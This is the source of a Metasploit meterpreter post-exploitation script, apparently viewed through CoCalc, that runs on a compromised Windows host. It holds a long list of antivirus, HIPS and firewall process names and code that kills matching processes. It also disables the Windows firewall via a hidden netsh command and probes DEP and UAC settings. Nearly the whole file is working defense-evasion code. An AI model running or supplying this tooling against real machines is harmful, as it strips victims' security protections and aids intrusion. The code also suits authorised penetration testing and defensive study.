CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
# If you'd like to improve this script, please try to port it as a post
4
# module instead. Thank you.
5
##
6

7

8
#
9
# Meterpreter script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration.
10
# Provides also the option to kill the processes of detected products and disable the built-in firewall.
11
# Provided by Carlos Perez at carlos_perez[at]darkoperator.com
12
# Version: 0.1.0
13
session = client
14
@@exec_opts = Rex::Parser::Arguments.new(
15
  "-h" => [ false, "Help menu." ],
16
  "-k" => [ false, "Kill any AV, HIPS and Third Party Firewall process found." ],
17
  "-d" => [ false, "Disable built in Firewall" ]
18
)
19

20
def usage
21
  print_line("Getcountermeasure -- List (or optionally, kill) HIPS and AV")
22
  print_line("processes, show XP firewall rules, and display DEP and UAC")
23
  print_line("policies")
24
  print(@@exec_opts.usage)
25
  raise Rex::Script::Completed
26
end
27

28
#-------------------------------------------------------------------------------
29
avs = %W{
30
  a2adguard.exe
31
  a2adwizard.exe
32
  a2antidialer.exe
33
  a2cfg.exe
34
  a2cmd.exe
35
  a2free.exe
36
  a2guard.exe
37
  a2hijackfree.exe
38
  a2scan.exe
39
  a2service.exe
40
  a2start.exe
41
  a2sys.exe
42
  a2upd.exe
43
  aavgapi.exe
44
  aawservice.exe
45
  aawtray.exe
46
  ad-aware.exe
47
  ad-watch.exe
48
  alescan.exe
49
  anvir.exe
50
  ashdisp.exe
51
  ashmaisv.exe
52
  ashserv.exe
53
  ashwebsv.exe
54
  aswupdsv.exe
55
  atrack.exe
56
  avgagent.exe
57
  avgamsvr.exe
58
  avgcc.exe
59
  avgctrl.exe
60
  avgemc.exe
61
  avgnt.exe
62
  avgtcpsv.exe
63
  avguard.exe
64
  avgupsvc.exe
65
  avgw.exe
66
  avkbar.exe
67
  avk.exe
68
  avkpop.exe
69
  avkproxy.exe
70
  avkservice.exe
71
  avktray
72
  avktray.exe
73
  avkwctl
74
  avkwctl.exe
75
  avmailc.exe
76
  avp.exe
77
  avpm.exe
78
  avpmwrap.exe
79
  avsched32.exe
80
  avwebgrd.exe
81
  avwin.exe
82
  avwupsrv.exe
83
  avz.exe
84
  bdagent.exe
85
  bdmcon.exe
86
  bdnagent.exe
87
  bdss.exe
88
  bdswitch.exe
89
  blackd.exe
90
  blackice.exe
91
  blink.exe
92
  boc412.exe
93
  boc425.exe
94
  bocore.exe
95
  bootwarn.exe
96
  cavrid.exe
97
  cavtray.exe
98
  ccapp.exe
99
  ccevtmgr.exe
100
  ccimscan.exe
101
  ccproxy.exe
102
  ccpwdsvc.exe
103
  ccpxysvc.exe
104
  ccsetmgr.exe
105
  cfgwiz.exe
106
  cfp.exe
107
  clamd.exe
108
  clamservice.exe
109
  clamtray.exe
110
  cmdagent.exe
111
  cpd.exe
112
  cpf.exe
113
  csinsmnt.exe
114
  dcsuserprot.exe
115
  defensewall.exe
116
  defensewall_serv.exe
117
  defwatch.exe
118
  f-agnt95.exe
119
  fpavupdm.exe
120
  f-prot95.exe
121
  f-prot.exe
122
  fprot.exe
123
  fsaua.exe
124
  fsav32.exe
125
  f-sched.exe
126
  fsdfwd.exe
127
  fsm32.exe
128
  fsma32.exe
129
  fssm32.exe
130
  f-stopw.exe
131
  f-stopw.exe
132
  fwservice.exe
133
  fwsrv.exe
134
  iamstats.exe
135
  iao.exe
136
  icload95.exe
137
  icmon.exe
138
  idsinst.exe
139
  idslu.exe
140
  inetupd.exe
141
  irsetup.exe
142
  isafe.exe
143
  isignup.exe
144
  issvc.exe
145
  kav.exe
146
  kavss.exe
147
  kavsvc.exe
148
  klswd.exe
149
  kpf4gui.exe
150
  kpf4ss.exe
151
  livesrv.exe
152
  lpfw.exe
153
  mcagent.exe
154
  mcdetect.exe
155
  mcmnhdlr.exe
156
  mcrdsvc.exe
157
  mcshield.exe
158
  mctskshd.exe
159
  mcvsshld.exe
160
  mghtml.exe
161
  mpftray.exe
162
  msascui.exe
163
  mscifapp.exe
164
  msfwsvc.exe
165
  msgsys.exe
166
  msssrv.exe
167
  navapsvc.exe
168
  navapw32.exe
169
  navlogon.dll
170
  navstub.exe
171
  navw32.exe
172
  nisemsvr.exe
173
  nisum.exe
174
  nmain.exe
175
  noads.exe
176
  nod32krn.exe
177
  nod32kui.exe
178
  nod32ra.exe
179
  npfmntor.exe
180
  nprotect.exe
181
  nsmdtr.exe
182
  oasclnt.exe
183
  ofcdog.exe
184
  opscan.exe
185
  ossec-agent.exe
186
  outpost.exe
187
  paamsrv.exe
188
  pavfnsvr.exe
189
  pcclient.exe
190
  pccpfw.exe
191
  pccwin98.exe
192
  persfw.exe
193
  protector.exe
194
  qconsole.exe
195
  qdcsfs.exe
196
  rtvscan.exe
197
  sadblock.exe
198
  safe.exe
199
  sandboxieserver.exe
200
  savscan.exe
201
  sbiectrl.exe
202
  sbiesvc.exe
203
  sbserv.exe
204
  scfservice.exe
205
  sched.exe
206
  schedm.exe
207
  scheduler daemon.exe
208
  sdhelp.exe
209
  serv95.exe
210
  sgbhp.exe
211
  sgmain.exe
212
  slee503.exe
213
  smartfix.exe
214
  smc.exe
215
  snoopfreesvc.exe
216
  snoopfreeui.exe
217
  spbbcsvc.exe
218
  sp_rsser.exe
219
  spyblocker.exe
220
  spybotsd.exe
221
  spysweeper.exe
222
  spysweeperui.exe
223
  spywareguard.dll
224
  spywareterminatorshield.exe
225
  ssu.exe
226
  steganos5.exe
227
  stinger.exe
228
  swdoctor.exe
229
  swupdate.exe
230
  symlcsvc.exe
231
  symundo.exe
232
  symwsc.exe
233
  symwscno.exe
234
  tcguard.exe
235
  tds2-98.exe
236
  tds-3.exe
237
  teatimer.exe
238
  tgbbob.exe
239
  tgbstarter.exe
240
  tsatudt.exe
241
  umxagent.exe
242
  umxcfg.exe
243
  umxfwhlp.exe
244
  umxlu.exe
245
  umxpol.exe
246
  umxtray.exe
247
  usrprmpt.exe
248
  vetmsg9x.exe
249
  vetmsg.exe
250
  vptray.exe
251
  vsaccess.exe
252
  vsserv.exe
253
  wcantispy.exe
254
  win-bugsfix.exe
255
  winpatrol.exe
256
  winpatrolex.exe
257
  wrsssdk.exe
258
  xcommsvr.exe
259
  xfr.exe
260
  xp-antispy.exe
261
  zegarynka.exe
262
  zlclient.exe
263
}
264
#-------------------------------------------------------------------------------
265
# Check for the presence of AV, HIPS and Third Party firewall and/or kill the
266
# processes associated with it
267
def check(session,avs,killbit)
268
  print_status("Checking for contermeasures...")
269
  session.sys.process.get_processes().each do |x|
270
    if (avs.index(x['name'].downcase))
271
      print_status("\tPossible countermeasure found #{x['name']} #{x['path']}")
272
      if (killbit)
273
        print_status("\tKilling process for countermeasure.....")
274
        session.sys.process.kill(x['pid'])
275
      end
276
    end
277
  end
278
end
279
#-------------------------------------------------------------------------------
280
# Get the configuration and/or disable the built in Windows Firewall
281
def checklocalfw(session,killfw)
282
  print_status("Getting Windows Built in Firewall configuration...")
283
  opmode = ""
284
  r = session.sys.process.execute("cmd.exe /c netsh firewall show opmode", nil, {'Hidden' => 'true', 'Channelized' => true})
285
  while(d = r.channel.read)
286
    opmode << d
287
  end
288
  r.channel.close
289
  r.close
290
  opmode.split("\n").each do |o|
291
    print_status("\t#{o}")
292
  end
293
  if (killfw)
294
    print_status("Disabling Built in Firewall.....")
295
    f = session.sys.process.execute("cmd.exe /c netsh firewall set opmode mode=DISABLE", nil, {'Hidden' => 'true','Channelized' => true})
296
    while(d = f.channel.read)
297
      if d =~ /The requested operation requires elevation./
298
        print_status("\tUAC or Insufficient permissions prevented the disabling of Firewall")
299
      end
300
    end
301
    f.channel.close
302
    f.close
303
  end
304
end
305
#-------------------------------------------------------------------------------
306
# Function for getting the current DEP Policy on the Windows Target
307
def checkdep(session)
308
  tmpout = ""
309
  depmode = ""
310
  # Expand environment %TEMP% variable
311
  tmp = session.sys.config.getenv('TEMP')
312
  # Create random name for the wmic output
313
  wmicfile = sprintf("%.5d",rand(100000))
314
  wmicout = "#{tmp}\\#{wmicfile}"
315
  print_status("Checking DEP Support Policy...")
316
  r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmicout} OS Get DataExecutionPrevention_SupportPolicy", nil, {'Hidden' => true})
317
  sleep(2)
318
  r.close
319
  r = session.sys.process.execute("cmd.exe /c type #{wmicout}", nil, {'Hidden' => 'true','Channelized' => true})
320
    while(d = r.channel.read)
321
      tmpout << d
322
    end
323
  r.channel.close
324
  r.close
325
  session.sys.process.execute("cmd.exe /c del #{wmicout}", nil, {'Hidden' => true})
326
  depmode = tmpout.scan(/(\d)/)
327
  if depmode.to_s == "0"
328
    print_status("\tDEP is off for the whole system.")
329
  elsif depmode.to_s == "1"
330
    print_status("\tFull DEP coverage for the whole system with no exceptions.")
331
  elsif depmode.to_s == "2"
332
    print_status("\tDEP is limited to Windows system binaries.")
333
  elsif depmode.to_s == "3"
334
    print_status("\tDEP is on for all programs and services.")
335
  end
336

337
end
338
#-------------------------------------------------------------------------------
339
def checkuac(session)
340
  print_status("Checking if UAC is enabled ...")
341
  key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'
342
  root_key, base_key = session.sys.registry.splitkey(key)
343
  value = "EnableLUA"
344
  open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)
345
  v = open_key.query_value(value)
346
  if v.data == 1
347
    print_status("\tUAC is Enabled")
348
  else
349
    print_status("\tUAC is Disabled")
350
  end
351
end
352

353
################## MAIN ##################
354
killbt = false
355
killfw = false
356
@@exec_opts.parse(args) { |opt, idx, val|
357
  case opt
358
  when "-k"
359
    killbt = true
360
  when "-d"
361
    killfw = true
362
  when "-h"
363
    usage
364
  end
365
}
366
# get the version of windows
367
if client.platform == 'windows'
368
  wnvr = session.sys.config.sysinfo["OS"]
369
  print_status("Running Getcountermeasure on the target...")
370
  check(session,avs,killbt)
371
  if wnvr !~ /Windows 2000/
372
    checklocalfw(session, killfw)
373
    checkdep(session)
374
  end
375
  if wnvr =~ /Windows Vista/
376
    checkuac(session)
377
  end
378
else
379
  print_error("This version of Meterpreter is not supported with this Script!")
380
  raise Rex::Script::Completed
381
end
382

383